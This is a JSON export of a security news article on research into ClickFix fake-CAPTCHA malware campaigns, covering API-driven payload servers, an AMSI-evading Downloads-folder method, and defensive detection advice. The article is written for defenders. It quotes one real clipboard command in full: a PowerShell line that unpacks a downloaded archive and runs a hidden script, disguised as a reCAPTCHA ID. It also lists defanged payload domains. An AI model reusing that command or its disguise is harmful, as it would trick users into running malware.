{"id":1545,"date":"2026-07-01T09:57:23","date_gmt":"2026-07-01T09:57:23","guid":{"rendered":"https:\/\/thedigitalfortress.us\/?p=1545"},"modified":"2026-07-01T09:57:23","modified_gmt":"2026-07-01T09:57:23","slug":"researcher-analyzes-3000-live-clickfix-payloads-exposing-api-driven-malware-delivery","status":"publish","type":"post","link":"https:\/\/thedigitalfortress.us\/?p=1545","title":{"rendered":"Researcher Analyzes 3,000 Live ClickFix Payloads, Exposing API-Driven Malware Delivery"},"content":{"rendered":"<div id=\"articlebody\">\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjXEaR4unJmt3rBY1LzI0Gq_veoF7Qzi-yPQNUcoR2oNV802lQ4MZAviyeq7bBh73PLAyp1quTozDq0ki_zm_9qsJIIfAUTaG8jFTv5dpxvuDUPJZA2BU4Zo11wIVyysWeMROXv8z2XOZoPOoJPVqMEJEhCI_OE1mM5wnSCFHJ1sgjl5411fZ4srklq5Fbs\/s1700-e365\/clickfix-payloads.jpg\" style=\"display: block;  text-align: center; clear: left; float: left;\"><\/a><\/div>\n<p><b>ClickFix<\/b>, the trick that fools people into running malware by hand, has quietly grown a back office.<\/p>\n<p>New research shows the malicious commands behind its fake \u00abprove you&#8217;re human\u00bb pages are now handed out by API-driven servers that give each visitor the same malware in a different disguise. The same research also turned up a new delivery method built to slip past Windows&#8217; script scanning.<\/p>\n<p>Security researcher Bert-Jan Pals took apart several ClickFix platforms and analyzed roughly 3,000 payloads from live campaigns. He presented the findings at\u00a0<a href=\"https:\/\/orangecon.nl\/\">OrangeCon<\/a>\u00a0in early June and\u00a0<a href=\"https:\/\/kqlquery.com\/posts\/clickfix-gift-that-keeps-on-giving\/\">published the details<\/a>\u00a0on June 30.<\/p>\n<p>ClickFix is simple by design. A booby-trapped page shows a fake CAPTCHA or error, hidden JavaScript drops a command into your clipboard, and the page tells you to press a key combo, paste, and hit Enter. You run the malware yourself.<\/p>\n<p>There&#8217;s usually no exploit at the first step and often no file for traditional antivirus to flag, so conventional email and endpoint controls have less to catch.<\/p>\n<p>It works well enough that ESET measured a\u00a0<a href=\"https:\/\/web-assets.esetstatic.com\/wls\/en\/papers\/threat-reports\/eset-threat-report-h12025.pdf\">517% jump<\/a>\u00a0from late 2024 into the first half of 2025, and Microsoft&#8217;s\u00a0<a href=\"https:\/\/www.microsoft.com\/en-us\/security\/security-insider\/threat-landscape\/microsoft-digital-defense-report-2025\">2025 Digital Defense Report<\/a>\u00a0put it at 47% of the initial-access cases seen by its Defender Experts team.<\/p>\n<div class=\"dog_two clear\">\n<div class=\"cf\"><a href=\"https:\/\/thehackernews.uk\/ai-vuln-protection-d\" rel=\"nofollow noopener sponsored\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"lazyload\" alt=\"Cybersecurity\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjQl2axNwsfhbXOFynrg_uAZsvHi3OvNGSA8KJO-BKR8Xm3x7yjKV3EvfY4v5mwXx6LF0uWFb9h9d9iAV_Pi-YYhqimX9wx4OaLdDJEdR215Xrxq_PAtXkaLfQso4pTSjbj6fvh_ZTliLpzWZSZfcoZgyXtKwhN-SSDDlmbtUqGLshc0KqYQGWYHMN52Sl1\/s728-e100\/zz-d.jpg\" width=\"729\" height=\"91\"\/><\/a><\/div>\n<\/div>\n<p>The technique now has its own entry in MITRE ATT&amp;CK,\u00a0<a href=\"https:\/\/attack.mitre.org\/techniques\/T1204\/004\/\">T1204.004<\/a>.<\/p>\n<h2>Payloads made to order<\/h2>\n<p>The new part is how the payloads are produced. Pals found the pages pulling their commands from backend servers that work like an on-demand service: they take requests, check an access token, log the caller, and return a freshly scrambled command each time.<\/p>\n<p><a name=\"more\"\/><\/p>\n<p>He asked one server for 100 payloads and got 100 different ones, wrapped in a rotating mix of Base64, AES, TripleDES, Rijndael, and Deflate. Strip the wrapping and, at least for now, they all unpack to the same script, which runs in memory through a PowerShell runspace.<\/p>\n<p>The disguise is disposable; the malware under it is not, though Pals warns the core payload will likely start changing per victim before long. The same platform serves lures in 25 languages and matches the command to the visitor&#8217;s operating system, with macOS versions running alongside Windows.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRmFjOW8cuDHBY0R6fPSecckOV76Vqojnqa4VTkpM8Bz_iAWPP7HgvmPRBUWPrmWm6945kyBuzLZLFF-vW5VnA5vsUEtN_nmTxE4REwjmEV1kuGH_onQ62YYUl7AbnCsG1jaza3SxnQwaCcsZpCZHgTQEeII0tC-UGLt6rbvboUVBvnrnjXsi2oBBLdq4t\/s1700-e365\/CLICKFIX-1.png\" style=\"display: block;  text-align: center; clear: left; float: left;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgRmFjOW8cuDHBY0R6fPSecckOV76Vqojnqa4VTkpM8Bz_iAWPP7HgvmPRBUWPrmWm6945kyBuzLZLFF-vW5VnA5vsUEtN_nmTxE4REwjmEV1kuGH_onQ62YYUl7AbnCsG1jaza3SxnQwaCcsZpCZHgTQEeII0tC-UGLt6rbvboUVBvnrnjXsi2oBBLdq4t\/s1700-e365\/CLICKFIX-1.png\" alt=\"\" border=\"0\" data-original-height=\"454\" data-original-width=\"1009\"\/><\/a><\/div>\n<p>The \u00abas-a-service\u00bb label is not just branding. ESET has tracked criminals selling ready-made ClickFix builders to other attackers. Pals found a parallel commercialization one layer deeper, in how each payload is churned out on request.<\/p>\n<h2>A quieter way in: the Downloads-folder method<\/h2>\n<p>The second finding is a direct answer to defenders who watch the clipboard. Instead of copying a malicious command, the newer pages copy a harmless-looking one.<\/p>\n<div class=\"separator\" style=\"clear: both;\"><a href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDZDZiDYhbbykGarkNCCPI3OzC3GwO9WJsD_dhqvWlLt48Gs5RWZdg_BHeJMzkT2TnS8VFhm6zCLsZY-zeC9-Yu0furP4qSA_j1a5uticHlU36W-QoLDw1AzrHI3KQvti9Xlffzo76MwGlzGrIOCnvYH0QI0ttmMi-GFd3V5lDJcsLO2_ib9mpEDpQKI9m\/s1700-e365\/CLICKFIX-2.png\" style=\"display: block;  text-align: center; clear: left; float: left;\"><img decoding=\"async\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjDZDZiDYhbbykGarkNCCPI3OzC3GwO9WJsD_dhqvWlLt48Gs5RWZdg_BHeJMzkT2TnS8VFhm6zCLsZY-zeC9-Yu0furP4qSA_j1a5uticHlU36W-QoLDw1AzrHI3KQvti9Xlffzo76MwGlzGrIOCnvYH0QI0ttmMi-GFd3V5lDJcsLO2_ib9mpEDpQKI9m\/s1700-e365\/CLICKFIX-2.png\" alt=\"\" border=\"0\" data-original-height=\"564\" data-original-width=\"1213\"\/><\/a><\/div>\n<p>The page quietly downloads a file to the Downloads folder, and the clipboard gets a short \u00aborchestrator\u00bb line that moves that file, unpacks it, and runs the script inside. Because the pasted line is only that orchestrator and not the payload itself, it is built to slide past AMSI, the Windows feature that lets antivirus scan scripts before they run. The bad code sits in the downloaded file, off to the side. The observed clipboard line looked like this:<\/p>\n<p>powershell -C \u00ab$t=$env:TMP;Move-Item \\\u00bb$HOME\\Downloads\\tmp.zip\\\u00bb \\\u00bb$t\\7947.zip\\\u00bb;tar -xf \\\u00bb$t\\7947.zip\\\u00bb -C \\\u00bb$t\\\u00bb;conhost &#8211;headless powershell -ExecutionPolicy Bypass -File \\\u00bb$t\\tmp.ps1\\\u00bb # \\\u00bb* I am not a robot reCAPTCHA Verification ID:7947 *\\\u00bb\u00bb<\/p>\n<p>Execution has drifted toward stealth as well. The original 2024 lure told people to press\u00a0Windows+R\u00a0and paste into the Run box. A newer version, common through 2025 and into 2026, points them to\u00a0Windows+X\u00a0and the Windows Terminal instead. Terminal use looks more ordinary, and unlike the Run box, it leaves no trace in the RunMRU registry key that investigators normally check.<\/p>\n<p>ClickFix stopped being a criminals-only tool a while ago.\u00a0<a href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/around-world-90-days-state-sponsored-actors-try-clickfix\">Proofpoint<\/a>\u00a0tied state-backed groups from Russia, Iran, and North Korea, including APT28, MuddyWater, and Kimsuky, to campaigns that dropped ClickFix into their existing infection chains, and North Korean crews built a fake-job \u00abClickFake Interview\u00bb version to hit cryptocurrency workers.<\/p>\n<div class=\"dog_two clear\">\n<div class=\"cf\"><a href=\"https:\/\/thehackernews.uk\/sygnia-cyber-response-d-1\" rel=\"nofollow noopener sponsored\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"lazyload\" alt=\"Cybersecurity\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiqmM4NpfZsx4cw-HrXQlCjZQmrF8bYnmB23AmpOPi16kPNB9lvICjpdYEclxJwyQ9OE8GgzQ8aOEI68tRuxNqov0MHz2Sq8xEPiYWM3Js6FM5t2nm2JHWodmR7qVSot14ZtWVqQRQ6B88OnMaVxCPwRG7xGPoIIZxF6QAhWVhMkQfs11NjyNtHsGEUH4_q\/s728-e100\/sygnia-d-1.jpg\" width=\"729\" height=\"91\"\/><\/a><\/div>\n<\/div>\n<p>The trick has spawned named relatives such as FileFix and <b>DownloadFix <\/b>that lean on other trusted Windows tools. The scale is not theoretical either: security firm Expel found one ClearFake wave that likely infected\u00a0as many as 147,521 systems\u00a0since late August 2025.<\/p>\n<h2>What defenders should watch<\/h2>\n<p>The defensive lesson has not changed. The details have. The dependable signals are process chains, not clipboard text:<b>\u00a0explorer.exe<\/b>\u00a0or\u00a0<b>WindowsTerminal.exe<\/b>\u00a0launching\u00a0<b>powershell.exe<\/b>,\u00a0<b>cmd.exe<\/b>, or\u00a0<b>msiexec.exe<\/b>\u00a0and reaching out to the network right after.<\/p>\n<p>Those were the most common launchers in Pals&#8217; data, with PowerShell and cmd tied at about 39% each and msiexec close behind at 34%.<\/p>\n<p>Behavioral EDR, application-control rules that limit which programs can call script interpreters, and plain user guidance (\u00abnever paste a command you were told to run into the Run box or a terminal\u00bb) all still hold. The Downloads-folder method adds one more thing to hunt: an innocent-looking one-liner that touches the Downloads folder and then spawns a hidden PowerShell.<\/p>\n<p>Pals also listed three payload servers seen during the research:<\/p>\n<ul>\n<li>comicstar[.]lat<\/li>\n<li>babybon[.]cfd<\/li>\n<li>merkantalolol[.]asia<\/li>\n<\/ul>\n<p>A connection to one of these does not prove infection. It means a command was most likely placed in someone&#8217;s clipboard.<\/p>\n<p>Pals&#8217; verdict on the technique is blunt: \u00abClickFix is here to stay.\u00bb The pattern across his research is that ClickFix shifts the moment defenders catch up, and the move from one-off scripts to on-demand payload servers is what keeps that adaptation cheap to repeat.<\/p>\n<p>The next thing worth watching is whether the malware itself, not just its wrapper, starts changing from one victim to the next.<\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>ClickFix, the trick that fools people into running malware by hand, has quietly grown a back office. New research shows the malicious commands behind its fake \u00abprove you&#8217;re human\u00bb pages&hellip;<\/p>\n","protected":false},"author":1,"featured_media":1546,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[2276,2280,225,2055,2279,2277,42,2278,1824],"class_list":["post-1545","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized","tag-analyzes","tag-apidriven","tag-clickfix","tag-delivery","tag-exposing","tag-live","tag-malware","tag-payloads","tag-researcher"],"_links":{"self":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/1545","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1545"}],"version-history":[{"count":0,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/posts\/1545\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=\/wp\/v2\/media\/1546"}],"wp:attachment":[{"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1545"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1545"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/thedigitalfortress.us\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1545"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}